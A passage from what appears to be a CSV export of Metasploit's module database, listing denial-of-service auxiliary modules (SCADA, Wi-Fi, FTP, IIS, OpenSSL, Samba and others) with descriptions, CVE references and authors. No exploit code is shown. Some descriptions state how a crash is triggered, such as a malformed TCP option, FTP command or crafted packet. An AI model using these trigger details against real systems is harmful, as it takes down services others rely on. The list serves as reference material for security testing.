00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/http/hashcollision_dos.rb","auxiliary","dos/http/hashcollision_dos","auxiliary/dos/http/hashcollision_dos","Hashtable Collisions",300,"This module uses a denial-of-service (DoS) condition appearing in a variety of programming languages. This vulnerability occurs when storing multiple values in a hash table and all values have the same hash value. This can cause a web server parsing the POST parameters issued with a request into a hash table to consume hours of CPU with a single HTTP request. Currently, only the hash functions for PHP and Java are implemented. This module was tested with PHP + httpd, Tomcat, Glassfish and Geronimo. 
It also generates a random payload to bypass some IDS signatures.","Metasploit Framework License (BSD)","f","2011-12-28 00:00:00",,,"aggressive","t","CVE-2011-4858, CVE-2011-4885, CVE-2011-5034, CVE-2011-5035, URL-http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf, URL-http://events.ccc.de/congress/2011/Fahrplan/events/4680.en.html, URL-http://www.nruns.com/_downloads/advisory28122011.pdf, URL-http://www.ocert.org/advisories/ocert-2011-003.html, URL-http://www.youtube.com/watch?v=R2Cq3CLI6H8","Alexander Klink, Christian Mehlmauer , Dan S. Wallach, Julian Waelde, Krzysztof Kotowicz, Scott A. Crosby" 1230,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb","auxiliary","dos/http/novell_file_reporter_heap_bof","auxiliary/dos/http/novell_file_reporter_heap_bof","NFR Agent Heap Overflow Vulnerability",300,"This module exploits a heap overflow in NFRAgent.exe, a component of Novell File Reporter (NFR). The vulnerability occurs when handling requests of name ""SRS"", where NFRAgent.exe fails to generate a response in a secure way, copying user controlled data into a fixed-length buffer in the heap without bounds checking. This module has been tested against NFR Agent 1.0.4.3 (File Reporter 1.0.2).","Metasploit Framework License (BSD)","f","2012-11-16 00:00:00",,,"aggressive","t","CVE-2012-4956, URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959","juan vazquez " 1231,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/http/sonicwall_ssl_format.rb","auxiliary","dos/http/sonicwall_ssl_format","auxiliary/dos/http/sonicwall_ssl_format","SonicWALL SSL-VPN Format String Vulnerability",300,"There is a format string vulnerability within the SonicWALL SSL-VPN Appliance - 200, 2000 and 4000 series. 
Arbitrary memory can be read or written to, depending on the format string used. There appears to be a length limit of 127 characters of format string data. With physical access to the device and debugging, this module may be able to be used to execute arbitrary code remotely.","Metasploit Framework License (BSD)","f","2009-05-29 00:00:00",,,"aggressive","t","BID-35145, OSVDB-54881, URL-http://www.aushack.com/200905-sonicwall.txt","patrick " 1232,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/http/webrick_regex.rb","auxiliary","dos/http/webrick_regex","auxiliary/dos/http/webrick_regex","Ruby WEBrick::HTTP::DefaultFileHandler DoS",300,"The WEBrick::HTTP::DefaultFileHandler in WEBrick in Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 1.8.7 to 1.8.7-p71, and 1.9 to r18423 allows for a DoS (CPU consumption) via a crafted HTTP request.","Metasploit Framework License (BSD)","f","2008-08-08 00:00:00",,,"aggressive","t","BID-30644, CVE-2008-3656, OSVDB-47471, URL-http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/","kris katterjohn " 1233,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/mdns/avahi_portzero.rb","auxiliary","dos/mdns/avahi_portzero","auxiliary/dos/mdns/avahi_portzero","Avahi < 0.6.24 Source Port 0 DoS",300,"Avahi-daemon versions prior to 0.6.24 can be DoS'd with an mDNS packet with a source port of 0","Metasploit Framework License (BSD)","f","2008-11-14 00:00:00",,,"aggressive","t","CVE-2008-5081, OSVDB-50929","kris katterjohn " 1234,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/misc/dopewars.rb","auxiliary","dos/misc/dopewars","auxiliary/dos/misc/dopewars","Dopewars Denial of Service",300,"The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation.","Metasploit Framework License (BSD)","f","2009-10-05 00:00:00",,,"aggressive","t","BID-36606, CVE-2009-3591, OSVDB-58884","Doug Prostko " 1235,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb","auxiliary","dos/ntp/ntpd_reserved_dos","auxiliary/dos/ntp/ntpd_reserved_dos","NTP.org ntpd Reserved Mode Denial of Service",300,"This module exploits a denial of service vulnerability within the NTP (network time protocol) demon. By sending a single packet to a vulnerable ntpd server (Victim A), spoofed from the IP address of another vulnerable ntpd server (Victim B), both victims will enter an infinite response loop. Note, unless you control the spoofed source host or the real remote host(s), you will not be able to halt the DoS condition once begun!","Metasploit Framework License (BSD)","f","2009-10-04 00:00:00",,,"aggressive","t","BID-37255, CVE-2009-3563, OSVDB-60847, URL-https://support.ntp.org/bugs/show_bug.cgi?id=1331","todb " 1236,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb","auxiliary","dos/pptp/ms02_063_pptp_dos","auxiliary/dos/pptp/ms02_063_pptp_dos","MS02-063 PPTP Malformed Control Data Kernel Denial of Service",300,"This module exploits a kernel based overflow when sending abnormal PPTP Control Data packets to Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers (Remote Access Services). Kernel memory is overwritten resulting in a BSOD. 
Code execution may be possible however this module is only a DoS.","Metasploit Framework License (BSD)","f","2002-09-26 00:00:00",,,"aggressive","t","BID-5807, CVE-2002-1214, MSB-MS02-063, OSVDB-13422","patrick " 1237,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb","auxiliary","dos/samba/lsa_addprivs_heap","auxiliary/dos/samba/lsa_addprivs_heap","Samba lsa_io_privilege_set Heap Overflow",300,"This module triggers a heap overflow in the LSA RPC service of the Samba daemon.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2007-2446, OSVDB-34699","hdm " 1238,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/samba/lsa_transnames_heap.rb","auxiliary","dos/samba/lsa_transnames_heap","auxiliary/dos/samba/lsa_transnames_heap","Samba lsa_io_trans_names Heap Overflow",300,"This module triggers a heap overflow in the LSA RPC service of the Samba daemon.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2007-2446, OSVDB-34699","hdm " 1239,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb","auxiliary","dos/sap/sap_soap_rfc_eps_delete_file","auxiliary/dos/sap/sap_soap_rfc_eps_delete_file","SAP SOAP EPS_DELETE_FILE File Deletion",300,"This module abuses the SAP NetWeaver EPS_DELETE_FILE function, on the SAP SOAP RFC Service, to delete arbitrary files on the remote file system. 
The module can also be used to capture SMB hashes by using a fake SMB share as DIRNAME.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-74780, URL-http://dsecrg.com/pages/vul/show.php?id=331, URL-https://service.sap.com/sap/support/notes/1554030","Alexey Sintsov, nmonkee" 1240,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/scada/beckhoff_twincat.rb","auxiliary","dos/scada/beckhoff_twincat","auxiliary/dos/scada/beckhoff_twincat","Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS",300,"The Beckhoff TwinCAT version <= 2.11.0.2004 can be brought down by sending a crafted UDP packet to port 48899 (TCATSysSrv.exe).","Metasploit Framework License (BSD)","f","2011-09-13 00:00:00",,,"aggressive","t","CVE-2011-3486, OSVDB-75495, URL-http://aluigi.altervista.org/adv/twincat_1-adv.txt","Luigi Auriemma, jfa" 1241,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/scada/d20_tftp_overflow.rb","auxiliary","dos/scada/d20_tftp_overflow","auxiliary/dos/scada/d20_tftp_overflow","General Electric D20ME TFTP Server Buffer Overflow DoS",300,"By sending a malformed TFTP request to the GE D20ME, it is possible to crash the device. This module is based on the original 'd20ftpbo.rb' Basecamp module from DigitalBond.","Metasploit Framework License (BSD)","f","2012-01-19 00:00:00",,,"aggressive","t","URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/","K. Reid Wightman , todb " 1242,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/scada/igss9_dataserver.rb","auxiliary","dos/scada/igss9_dataserver","auxiliary/dos/scada/igss9_dataserver","7-Technologies IGSS 9 IGSSdataServer.exe DoS",300,"The 7-Technologies SCADA IGSS Data Server (IGSSdataServer.exe) <= 9.0.0.10306 can be brought down by sending a crafted TCP packet to port 12401. 
This should also work for version <= 9.0.0.1120, but that version hasn't been tested.","Metasploit Framework License (BSD)","f","2011-12-20 00:00:00",,,"aggressive","t","CVE-2011-4050, OSVDB-77976, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-335-01.pdf","jfa" 1243,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/smtp/sendmail_prescan.rb","auxiliary","dos/smtp/sendmail_prescan","auxiliary/dos/smtp/sendmail_prescan","Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption",300,"This is a proof of concept denial of service module for Sendmail versions 8.12.8 and earlier. The vulnerability is within the prescan() method when parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00 bytes can be used, limiting the likelihood for arbitrary code execution.","Metasploit Framework License (BSD)","f","2003-09-17 00:00:00",,,"aggressive","t","BID-8641, CVE-2003-0694, EDB-24, OSVDB-2577","patrick " 1244,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb","auxiliary","dos/solaris/lpd/cascade_delete","auxiliary/dos/solaris/lpd/cascade_delete","Solaris LPD Arbitrary File Delete",300,"This module uses a vulnerability in the Solaris line printer daemon to delete arbitrary files on an affected system. This can be used to exploit the rpc.walld format string flaw, the missing krb5.conf authentication bypass, or simply delete system files. 
Tested on Solaris 2.6, 7, 8, 9, and 10.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-14510, CVE-2005-4797, OSVDB-18650, URL-http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1","Optyx , hdm " 1245,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb","auxiliary","dos/ssl/dtls_changecipherspec","auxiliary/dos/ssl/dtls_changecipherspec","OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS",300,"This module performs a Denial of Service Attack against Datagram TLS in OpenSSL version 0.9.8i and earlier. OpenSSL crashes under these versions when it recieves a ChangeCipherspec Datagram before a ClientHello.","Metasploit Framework License (BSD)","f","2000-04-26 00:00:00",,,"aggressive","t","CVE-2009-1386, OSVDB-55073","Jon Oberheide , theLightCosine " 1246,"2013-05-13 21:30:07","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/ssl/openssl_aesni.rb","auxiliary","dos/ssl/openssl_aesni","auxiliary/dos/ssl/openssl_aesni","OpenSSL TLS 1.1 and 1.2 AES-NI DoS",300,"The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the length of an encrypted message when used with a TLS version 1.1 or above. This leads to an integer underflow which can cause a DoS. The vulnerable function aesni_cbc_hmac_sha1_cipher is only included in the 64-bit versions of OpenSSL. This module has been tested successfully on Ubuntu 12.04 (64-bit) with the default OpenSSL 1.0.1c package.","Metasploit Framework License (BSD)","f","2013-02-05 00:00:00",,,"aggressive","t","CVE-2012-2686, URL-https://www.openssl.org/news/secadv_20130205.txt","Wolfgang Ettlinger " 1247,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb","auxiliary","dos/syslog/rsyslog_long_tag","auxiliary/dos/syslog/rsyslog_long_tag","rsyslog Long Tag Off-By-Two DoS",300,"This module triggers an off-by-two overflow in the rsyslog daemon. 
This flaw is unlikely to yield code execution but is effective at shutting down a remote log daemon. This bug was introduced in version 4.6.0 and corrected in 4.6.8/5.8.5. Compiler differences may prevent this bug from causing any noticeable result on many systems (RHEL6 is affected).","Metasploit Framework License (BSD)","f","2011-09-01 00:00:00",,,"aggressive","t","CVE-2011-3200, URL-http://www.rsyslog.com/potential-dos-with-malformed-tag/, URL-https://bugzilla.redhat.com/show_bug.cgi?id=727644","hdm " 1248,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/tcp/junos_tcp_opt.rb","auxiliary","dos/tcp/junos_tcp_opt","auxiliary/dos/tcp/junos_tcp_opt","Juniper JunOS Malformed TCP Option",0,"This module exploits a denial of service vulnerability in Juniper Network's JunOS router operating system. By sending a TCP packet with TCP option 101 set, an attacker can cause an affected router to reboot.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-37670, OSVDB-61538, URL-http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/","todb " 1249,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/tcp/synflood.rb","auxiliary","dos/tcp/synflood","auxiliary/dos/tcp/synflood","TCP SYN Flooder",300,"A simple TCP SYN flooder","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"kris katterjohn " 1250,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb","auxiliary","dos/wifi/apple_orinoco_probe_response","auxiliary/dos/wifi/apple_orinoco_probe_response","Apple Airport 802.11 Probe Response Kernel Memory Corruption",300,"The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs) is vulnerable to a remote memory corruption flaw. 
When the driver is placed into active scanning mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading to arbitrary code execution. This vulnerability is triggered when a probe response frame is received that does not contain valid information element (IE) fields after the fixed-length header. The data following the fixed-length header is copied over internal kernel structures, resulting in memory operations being performed on attacker-controlled pointer values.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2006-5710, OSVDB-30180","hdm " 1251,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wifi/cts_rts_flood.rb","auxiliary","dos/wifi/cts_rts_flood","auxiliary/dos/wifi/cts_rts_flood","Wireless CTS/RTS Flooder",300,"This module sends 802.11 CTS/RTS requests to a specific wireless peer, using the specified source address,","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Brad Antoniewicz" 1252,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wifi/deauth.rb","auxiliary","dos/wifi/deauth","auxiliary/dos/wifi/deauth","Wireless DEAUTH Flooder",300,"This module sends 802.11 DEAUTH requests to a specific wireless peer, using the specified source address and source BSSID.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Brad Antoniewicz" 1253,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wifi/fakeap.rb","auxiliary","dos/wifi/fakeap","auxiliary/dos/wifi/fakeap","Wireless Fake Access Point Beacon Flood",300,"This module can advertise thousands of fake access points, using random SSIDs and BSSID addresses. 
Inspired by Black Alchemy's fakeap tool.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , kris katterjohn " 1254,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wifi/file2air.rb","auxiliary","dos/wifi/file2air","auxiliary/dos/wifi/file2air","Wireless Frame (File) Injector",300,"Inspired by Josh Wright's file2air, this module writes wireless frames from a binary file to the air, allowing you to substitute some addresses before it gets sent. Unlike the original file2air (currently v1.1), this module *does* take into account the ToDS and FromDS flags in the frame when replacing any specified addresses.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"kris katterjohn " 1255,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb","auxiliary","dos/wifi/netgear_ma521_rates","auxiliary/dos/wifi/netgear_ma521_rates","NetGear MA521 Wireless Driver Long Rates Overflow",300,"This module exploits a buffer overflow in the NetGear MA521 wireless device driver under Windows XP. When a specific malformed frame (beacon or probe response) is received by the wireless interface under active scanning mode, the MA521nd5.SYS driver attempts to write to an attacker-controlled memory location. The vulnerability is triggered by an invalid supported rates information element. This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a NetGear MA521 Cardbus adapter. A remote code execution module is also in development. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. 
Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2006-6059, OSVDB-30507, URL-ftp://downloads.netgear.com/files/ma521_1_2.zip, URL-http://projects.info-pull.com/mokb/MOKB-18-11-2006.html","Laurent Butti <0x9090@gmail.com>" 1256,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wifi/netgear_wg311pci.rb","auxiliary","dos/wifi/netgear_wg311pci","auxiliary/dos/wifi/netgear_wg311pci","NetGear WG311v1 Wireless Driver Long SSID Overflow",300,"This module exploits a buffer overflow in the NetGear WG311v1 wireless device driver under Windows XP and 2000. A kernel-mode heap overflow occurs when malformed probe response frame is received that contains a long SSID field This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a NetGear WG311v1 PCI card. A remote code execution module is also in development. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2006-6125, OSVDB-30511, URL-ftp://downloads.netgear.com/files/wg311_1_3.zip, URL-http://projects.info-pull.com/mokb/MOKB-22-11-2006.html","Laurent Butti <0x9090@gmail.com>" 1257,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb","auxiliary","dos/wifi/probe_resp_null_ssid","auxiliary/dos/wifi/probe_resp_null_ssid","Multiple Wireless Vendor NULL SSID Probe Response",300,"This module exploits a firmware-level vulnerability in a variety of 802.11b devices. This attack works by sending a probe response frame containing a NULL SSID information element to an affected device. 
This flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere, Orinoco, and the first generation of Airport cards).","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://802.11ninja.net/papers/firmware_attack.pdf, WVE-2006-0064","hdm " 1258,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wifi/ssidlist_beacon.rb","auxiliary","dos/wifi/ssidlist_beacon","auxiliary/dos/wifi/ssidlist_beacon","Wireless Beacon SSID Emulator",300,"This module sends out beacon frames using SSID's identified in a specified file and randomly selected BSSID's. This is useful when combined with a Karmetasploit attack to get clients configured to not probe for networks in their PNL to start probing when they see a matching SSID in from this script. For a list of common SSID's to use with this script, check http://www.wigle.net/gps/gps/main/ssidstats. If a file of SSID's is not specified, a default list of 20 SSID's will be used. This script will run indefinitely until interrupted.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , joswr1ght" 1259,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/wifi/wifun.rb","auxiliary","dos/wifi/wifun","auxiliary/dos/wifi/wifun","Wireless Test Module",300,"This module is a test of the wireless packet injection system. 
Please see external/ruby-lorcon/README for more information.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1260,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/appian/appian_bpm.rb","auxiliary","dos/windows/appian/appian_bpm","auxiliary/dos/windows/appian/appian_bpm","Appian Enterprise Business Suite 5.6 SP1 DoS",300,"This module exploits a denial of service flaw in the Appian Enterprise Business Suite service.","BSD License","f","2007-12-17 00:00:00",,,"aggressive","t","CVE-2007-6509, OSVDB-39500, URL-http://archives.neohapsis.com/archives/fulldisclosure/2007-12/0440.html","guiness.stout " 1261,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb","auxiliary","dos/windows/browser/ms09_065_eot_integer","auxiliary/dos/windows/browser/ms09_065_eot_integer","Microsoft Windows EOT Font Table Directory Integer Overflow",300,"This module exploits an integer overflow flaw in the Microsoft Windows Embedded OpenType font parsing code located in win32k.sys. Since the kernel itself parses embedded web fonts, it is possible to trigger a BSoD from a normal web page when viewed with Internet Explorer.","Metasploit Framework License (BSD)","f","2009-11-10 00:00:00",,,"aggressive","t","CVE-2009-2514, MSB-MS09-065, OSVDB-59869","hdm " 1262,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb","auxiliary","dos/windows/ftp/filezilla_admin_user","auxiliary/dos/windows/ftp/filezilla_admin_user","FileZilla FTP Server Admin Interface Denial of Service",300,"This module triggers a Denial of Service condition in the FileZilla FTP Server Administration Interface in versions 0.9.4d and earlier. By sending a procession of excessively long USER commands to the FTP Server, the Administration Interface (FileZilla Server Interface.exe) when running, will overwrite the stack with our string and generate an exception. 
The FileZilla FTP Server itself will continue functioning.","Metasploit Framework License (BSD)","f","2005-11-07 00:00:00",,,"aggressive","t","BID-15346, CVE-2005-3589, EDB-1336, OSVDB-20817","patrick " 1263,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb","auxiliary","dos/windows/ftp/filezilla_server_port","auxiliary/dos/windows/ftp/filezilla_server_port","FileZilla FTP Server <=0.9.21 Malformed PORT Denial of Service",300,"This module triggers a Denial of Service condition in the FileZilla FTP Server versions 0.9.21 and earlier. By sending a malformed PORT command then LIST command, the server attempts to write to a NULL pointer.","Metasploit Framework License (BSD)","f","2006-12-11 00:00:00",,,"aggressive","t","BID-21542, BID-21549, CVE-2006-6565, EDB-2914, OSVDB-34435","patrick " 1264,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb","auxiliary","dos/windows/ftp/guildftp_cwdlist","auxiliary/dos/windows/ftp/guildftp_cwdlist","Guild FTPd 0.999.8.11/0.999.14 Heap Corruption",300,"Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable to heap corruption. You need to have a valid login so you can run CWD and LIST.","Metasploit Framework License (BSD)","f","2008-10-12 00:00:00",,,"aggressive","t","CVE-2008-4572, EDB-6738, OSVDB-49045","kris katterjohn " 1265,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb","auxiliary","dos/windows/ftp/iis75_ftpd_iac_bof","auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof","Microsoft IIS FTP Server Encoded Response Overflow Trigger",300,"This module triggers a heap overflow when processing a specially crafted FTP request containing Telnet IAC (0xff) bytes. When constructing the response, the Microsoft IIS FTP Service overflows the heap buffer with 0xff bytes. 
This issue can be triggered pre-auth and may in fact be explotiable for remote code execution.","Metasploit Framework License (BSD)","f","2010-12-21 00:00:00",,,"aggressive","t","BID-45542, CVE-2010-3972, EDB-15803, MSB-MS11-004, OSVDB-70167, URL-http://blogs.technet.com/b/srd/archive/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability.aspx","Matthew Bergin, jduck " 1266,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb","auxiliary","dos/windows/ftp/iis_list_exhaustion","auxiliary/dos/windows/ftp/iis_list_exhaustion","Microsoft IIS FTP Server <= 7.0 LIST Stack Exhaustion",300,"This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the ""FTP Publishing"" must be configured as ""manual"" mode in startup type 3) there must be at least one directory under FTP root directory. 
If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.","Metasploit Framework License (BSD)","f","2009-09-03 00:00:00",,,"aggressive","t","BID-36273, CVE-2009-2521, MSB-MS09-053, OSVDB-57753, URL-http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html, URL-https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx","Kingcope, Myo Soe" 1267,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/solarftp_user.rb","auxiliary","dos/windows/ftp/solarftp_user","auxiliary/dos/windows/ftp/solarftp_user","Solar FTP Server <= 2.1.1 Malformed (User) Denial of Service",300,"This module will send a format string as USER to Solar FTP, causing a READ violation in function ""__output_1()"" found in ""sfsservice.exe"" while trying to calculate the length of the string.","Metasploit Framework License (BSD)","f","2011-02-22 00:00:00",,,"aggressive","t","EDB-16204","C4SS!0 G0M3S , sinn3r , x000 <3d3n@hotmail.com.br>" 1268,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/titan626_site.rb","auxiliary","dos/windows/ftp/titan626_site","auxiliary/dos/windows/ftp/titan626_site","Titan FTP Server 6.26.630 SITE WHO DoS",300,"The Titan FTP server v6.26 build 630 can be DoS'd by issuing ""SITE WHO"". 
You need a valid login so you can send this command.","Metasploit Framework License (BSD)","f","2008-10-14 00:00:00",,,"aggressive","t","CVE-2008-6082, EDB-6753, OSVDB-49177","kris katterjohn " 1269,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb","auxiliary","dos/windows/ftp/vicftps50_list","auxiliary/dos/windows/ftp/vicftps50_list","Victory FTP Server 5.0 LIST DoS",300,"The Victory FTP Server v5.0 can be brought down by sending a very simple LIST command","Metasploit Framework License (BSD)","f","2008-10-24 00:00:00",,,"aggressive","t","CVE-2008-2031, CVE-2008-6829, EDB-6834, OSVDB-44608","kris katterjohn " 1270,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb","auxiliary","dos/windows/ftp/winftp230_nlst","auxiliary/dos/windows/ftp/winftp230_nlst","WinFTP 2.3.0 NLST Denial of Service",300,"This module is a very rough port of Julien Bedard's PoC. You need a valid login, but even anonymous can do it if it has permission to call NLST.","Metasploit Framework License (BSD)","f","2008-09-26 00:00:00",,,"aggressive","t","CVE-2008-5666, EDB-6581, OSVDB-49043","kris katterjohn " 1271,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb","auxiliary","dos/windows/ftp/xmeasy560_nlst","auxiliary/dos/windows/ftp/xmeasy560_nlst","XM Easy Personal FTP Server 5.6.0 NLST DoS",300,"This module is a port of shinnai's script. 
You need a valid login, but even anonymous can do it as long as it has permission to call NLST.","Metasploit Framework License (BSD)","f","2008-10-13 00:00:00",,,"aggressive","t","CVE-2008-5626, EDB-6741, OSVDB-50837","kris katterjohn " 1272,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb","auxiliary","dos/windows/ftp/xmeasy570_nlst","auxiliary/dos/windows/ftp/xmeasy570_nlst","XM Easy Personal FTP Server 5.7.0 NLST DoS",300,"You need a valid login to DoS this FTP server, but even anonymous can do it as long as it has permission to call NLST.","Metasploit Framework License (BSD)","f","2009-03-27 00:00:00",,,"aggressive","t","CVE-2008-5626, EDB-8294, OSVDB-50837","kris katterjohn " 1273,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/games/kaillera.rb","auxiliary","dos/windows/games/kaillera","auxiliary/dos/windows/games/kaillera","Kaillera 0.86 Server Denial of Service",300,"The Kaillera 0.86 server can be shut down by sending any malformed packet after the initial ""hello"" packet.","Metasploit Framework License (BSD)","f","2011-07-02 00:00:00",,,"aggressive","t","URL-http://kaillerahacks.blogspot.com/2011/07/kaillera-server-086-dos-vulnerability.html","Sil3nt_Dre4m" 1274,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb","auxiliary","dos/windows/http/ms10_065_ii6_asp_dos","auxiliary/dos/windows/http/ms10_065_ii6_asp_dos","Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service",300,"The vulnerability allows remote unauthenticated attackers to force the IIS server to become unresponsive until the IIS service is restarted manually by the administrator. 
